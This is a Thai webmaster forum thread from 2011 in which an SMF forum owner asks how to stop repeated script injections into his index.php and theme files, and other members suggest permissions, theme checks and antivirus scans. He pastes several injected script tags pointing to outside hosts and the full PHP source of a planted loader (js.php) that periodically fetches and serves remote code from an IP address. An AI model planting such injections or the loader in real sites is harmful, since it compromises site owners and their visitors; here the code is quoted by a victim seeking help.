ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์CMS & Free Scriptเว็บบอร์ด smf ผมโดนฝังสคริปท์ครับ ทำยังไงดีครับ
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: เว็บบอร์ด smf ผมโดนฝังสคริปท์ครับ ทำยังไงดีครับ  (อ่าน 865 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
Nopzixcros
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 158
ออฟไลน์ ออฟไลน์

กระทู้: 2,066



ดูรายละเอียด
« เมื่อ: 10 เมษายน 2011, 22:16:50 »

เว็บบอร์ดผมมันโดฝังสคริปไว้ที่ไฟล์ index.php และไฟล์ index.php ของธีมทุกธีมเลยครับ

ตอนนี้ผมเอาออกหมดแล้ว ผมจะป้องกันยังไงครับเพราะมันเคยฝังไปแล้วครั้งนึงผมก็เอาออกได้

ผมจะป้องกันยังไงครับที่จะไม่ให้มันเข้ามาฝังได้อีก  wanwan017

นี่ครับสคริปนี้ <script type="text/javascript" src="hทีทีp://itpdesign.net/search.php"></script>

 wanwan017 wanwan017
« แก้ไขครั้งสุดท้าย: 10 เมษายน 2011, 22:19:29 โดย Nopzixcros » บันทึกการเข้า
Uphichet
สมุนแก๊งเสียว
*

พลังน้ำใจ: 24
ออฟไลน์ ออฟไลน์

กระทู้: 530



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 10 เมษายน 2011, 22:25:48 »

นี่กำลังเขียน phpbb จะเจอแบบนี้ไหมเนี่ย
บันทึกการเข้า

Hanuman
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 383
ออฟไลน์ ออฟไลน์

กระทู้: 3,258



ดูรายละเอียด
« ตอบ #2 เมื่อ: 10 เมษายน 2011, 22:28:49 »

แสดงว่ามีการฝังมากกว่า 1 ครั้งหรอครับ
บันทึกการเข้า
Nopzixcros
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 158
ออฟไลน์ ออฟไลน์

กระทู้: 2,066



ดูรายละเอียด
« ตอบ #3 เมื่อ: 10 เมษายน 2011, 22:29:22 »

แสดงว่ามีการฝังมากกว่า 1 ครั้งหรอครับ


ใช่ครับ สคิรปแต่ละตัวไม่เหมือนกันด้วย

อันนี้อีกอัน ฝังไว้ที่ไฟล์ Entersite

<script type="text/javascript" src="http://small-servers.com/js.php "></script>

เพิ่มเติมครับ ส่วนที่เป็นบล็อกที่อยู่ในเว็บเดียวกันก็โดนฝังสคริปครับ

<script type="text/javascript" src="http://olayspor.net/search.php "></script>

มันฝังไว้ที่บนสุดของโค้ดเลย ไม่รู้ว่าจะป้องกันมันได้ยังไงอะครับ

ใครรู้ช่วยทีครับ
« แก้ไขครั้งสุดท้าย: 10 เมษายน 2011, 22:31:57 โดย Nopzixcros » บันทึกการเข้า
Duo2Styles
ก๊วนเสียว
*

พลังน้ำใจ: 42
ออฟไลน์ ออฟไลน์

กระทู้: 418



ดูรายละเอียด
« ตอบ #4 เมื่อ: 10 เมษายน 2011, 22:29:56 »

cmd ไฟล์เป็นอะไรคะ ลองปรับเป็น 644 ดู
บันทึกการเข้า
Nopzixcros
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 158
ออฟไลน์ ออฟไลน์

กระทู้: 2,066



ดูรายละเอียด
« ตอบ #5 เมื่อ: 10 เมษายน 2011, 22:36:27 »

cmd ไฟล์เป็นอะไรคะ ลองปรับเป็น 644 ดู


644 ทุกตัวครับไฟล์ index

เพิ่มเติมครับตอนนี้ผมเจอไฟล์แปลกๆบนโฮสครับ

ไม่รู้ว่ามันมาได้ไงเป็นไฟล์ชื่อ js.php

อันนี้โค้ดของมันครับ ใครพอรู้บ้างครับช่วยหน่อย

โค๊ด:
<?php

// ----------------------------------------------------------------------
// touch this!  ---------------------------------------------------------

define( &#39;CACHE_DEBUG&#39;,  false );
define( &#39;CACHE_TIME_SECONDS&#39;,  600 );
define( &#39;CACHE_UPDATE_URL&#39;,   "http://193.105.240.93/data/admin.txt" );

// ----------------------------------------------------------------------
// dont touch this! -----------------------------------------------------

define( &#39;CACHE_MARKER_START&#39;,  "<?p"."hp /* <CA"."CHE>" );  
define( &#39;CACHE_MARKER_END&#39;,  "</CA"."CHE> */ ?".">" );


// ----------------------------------------------------------------------


$cache_code  = null;
$cache_file  = __FILE__;
$cached_time  = time() - filemtime($cache_file);

// ----------------------------------------------------------------------

if (CACHE_DEBUG) echo "Cached time is {$cached_time} seconds, update planned after ".(CACHE_TIME_SECONDS $cached_time)." seconds
"
;


// ----------------------------------------------------------------------
// check cached time 

if($cached_time CACHE_TIME_SECONDS)
{
// get new cache code
$cache_code file_get_contents(CACHE_UPDATE_URL);
if(!empty($cache_code))
{
if (CACHE_DEBUG) echo "Update cache...
"
;
write_cache($cache_file$cache_code);
}
else
{
if (CACHE_DEBUG) echo "Can&#39;t get cache data!
"
;
}
}
else
{
if(CACHE_DEBUG) echo "Read cache code...
"
;

// extract cached data
$cache_code extract_cache($cache_file);
if(empty($cache_code))
{
if (CACHE_DEBUG) echo "Cache empty! Update cache...
"
;
$cache_code file_get_contents(CACHE_UPDATE_URL);
if(!empty($cache_code))
{
// write cache
write_cache($cache_file$cache_code);
}
else
{
if (CACHE_DEBUG) echo "Can&#39;t get cache data!
"
;
}
}
}

// ----------------------------------------------------------------------

header("Content-Type: text/plain; charset=windows-1251");
echo 
$cache_code;

// ----------------------------------------------------------------------

exit;

// ----------------------------------------------------------------------
/// read file data

function file_get_contents_locked($file_path)
{
$fp fopen($file_path"r");
if($fp !== FALSE)
{
flock($fpLOCK_EX);
$data fread($fpfilesize($file_path));
flock($fpLOCK_UN);
fclose($fp);

return $data;
}

return FALSE;
}


// ----------------------------------------------------------------------
/// extract cache from file by cache markers

function extract_cache($file_path)
{
$data file_get_contents_locked($file_path);
if(strpos($dataCACHE_MARKER_START) !== FALSE)
{
$cache_start_pos strpos($dataCACHE_MARKER_START)   strlen(CACHE_MARKER_START);
$cache_end_pos strpos($dataCACHE_MARKER_END);

$cache substr($data$cache_start_pos$cache_end_pos $cache_start_pos);

if(!empty($cache))
return base64_decode($cache);
}

return null;
}


// ----------------------------------------------------------------------
// write cache to file

function write_cache($file_path$cache_data)
{
if(!is_writable($file_path))
{
if (CACHE_DEBUG) echo "Cache file not writable!
"
;
return null;
}

$data file_get_contents_locked($file_path);
if($data !== FALSE && !empty($data))
{
// delete old cache
if(strpos($dataCACHE_MARKER_START) !== FALSE)
{
$cache_start_pos strpos($dataCACHE_MARKER_START);

$data substr($data0$cache_start_pos);
$data rtrim($data);
}

// restore close tags
if(substr($data, -22) !== &#39;?>
')
$data.="?>";

$data.= CACHE_MARKER_START .base64_encode($cache_data). CACHE_MARKER_END;

$fp=fopen($file_path, "w ");
flock($fp, LOCK_EX);
fwrite($fp, $data);
flock($fp, LOCK_UN);
fclose($fp);
}
}

เพิ่มเติมสคริปครับ ตอนนี้มันฝังสคริปนี้ทุกซับแล้วครับ

มันจะไม่เหมือนกันทุกไฟล์เลยครับ มันฝังสคริปละ1เว็บ แต่ละเว็บ url ไม่เหมือนกันซักอัน

<script type="text/javascript" src="http://whiskyace.com/search.php "></script>
<script type="text/javascript" src="http://riarenterprises.com/search.php ">

« แก้ไขครั้งสุดท้าย: 10 เมษายน 2011, 22:41:35 โดย Nopzixcros » บันทึกการเข้า
Nopzixcros
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 158
ออฟไลน์ ออฟไลน์

กระทู้: 2,066



ดูรายละเอียด
« ตอบ #6 เมื่อ: 10 เมษายน 2011, 22:42:47 »

ดันๆๆครับ
บันทึกการเข้า
bestnmk21
ก๊วนเสียว
*

พลังน้ำใจ: 41
ออฟไลน์ ออฟไลน์

กระทู้: 353



ดูรายละเอียด เว็บไซต์
« ตอบ #7 เมื่อ: 10 เมษายน 2011, 22:55:04 »

ติดมาจากธีมหรือป่าวครับ หรือมาจากม็อด
ขอตัวไปเช็คบ้าง  Tongue
บันทึกการเข้า

Smiley
Nopzixcros
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 158
ออฟไลน์ ออฟไลน์

กระทู้: 2,066



ดูรายละเอียด
« ตอบ #8 เมื่อ: 10 เมษายน 2011, 22:57:12 »

ติดมาจากธีมหรือป่าวครับ หรือมาจากม็อด
ขอตัวไปเช็คบ้าง  Tongue

ไม่แน่ใจเหมือนกันนะครับ ผมก็ไม่รู้ว่าเกิดจากปัญหาอะไร

ครั้งแรกที่เคยโดนผมเปลี่ยนพาส Ftp แล้ว

ครั้งนี้ยังกลับมาเป็นอีก
บันทึกการเข้า
ปาร์ค
Newbie
*

พลังน้ำใจ: 0
ออฟไลน์ ออฟไลน์

กระทู้: 14



ดูรายละเอียด
« ตอบ #9 เมื่อ: 11 เมษายน 2011, 10:01:57 »

อันนี้ผมเคยเป็นนะคับ แก้ยัง ๆ 1-2 วันก็เป็นอีก
เคยอ่านวิธีแก้ในนี้หล่ะ ปรากฎว่าเครื่องเรา ติด ไวรัส ประเภทมัลแวร์ ไรนี่ล่ะ 
ผมเลยแก้โดย Scan ไวรัสในเครื่อง ลบไฟล์กันยกใหญ่เลยทีเดียว คับ ตอนนั้นผมใช้ NOD32 นะ Scan นะคับ
เครื่องสอาดแล้วก็อัพไฟล์ขึ้นไปใหม่ก็หายคับ ลองดูนะคับ

ปล.อันนี้เป็นวิธีแก้ที่ผมเคยเจอนะครับ ของคุณอาจจะโดนไม่เหมือนผม และแก้ไม่เหมือนผมก็ได้
บันทึกการเข้า
หน้า: [1]   ขึ้นบน
พิมพ์